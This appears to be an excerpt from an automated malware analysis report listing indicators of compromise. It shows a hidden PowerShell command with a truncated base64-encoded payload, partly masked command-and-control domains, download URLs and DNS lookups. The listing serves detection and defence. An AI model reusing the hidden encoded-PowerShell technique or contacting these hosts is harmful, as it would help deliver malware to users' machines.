Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABBAHMAYQB1AGMAbgBhAHEAZQB6AGgAPQAnAEkAcgB3AHkAeABsAHcAdwBtAGMAaAAnADsAJABGAHAAZwB4AGcAbgBwAHQAIAA9ACAAJwAxADEAJwA7ACQAVgBhAHQAbQB6AHEAZABnAG4AagBzAD0AJwBRAG0AZwB1AHUAbABjAHkAZwB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1988
- %TEMP%\1302093.cvr
- 'sc####rreviews.com':80
- 'hu###omains.com':443
- 'na###affron.com':80
- 'oo##a.com':443
- http://sc####rreviews.com/wp-admin/DSscXHm/
- http://na###affron.com/v59rni/ZTuaJanco/
- 'hu###omains.com':443
- 'oo##a.com':443
- DNS ASK ne####ndmall.store
- DNS ASK sc####rreviews.com
- DNS ASK hu###omains.com
- DNS ASK na###affron.com
- DNS ASK oo##a.com
- DNS ASK ma####l.devpace.net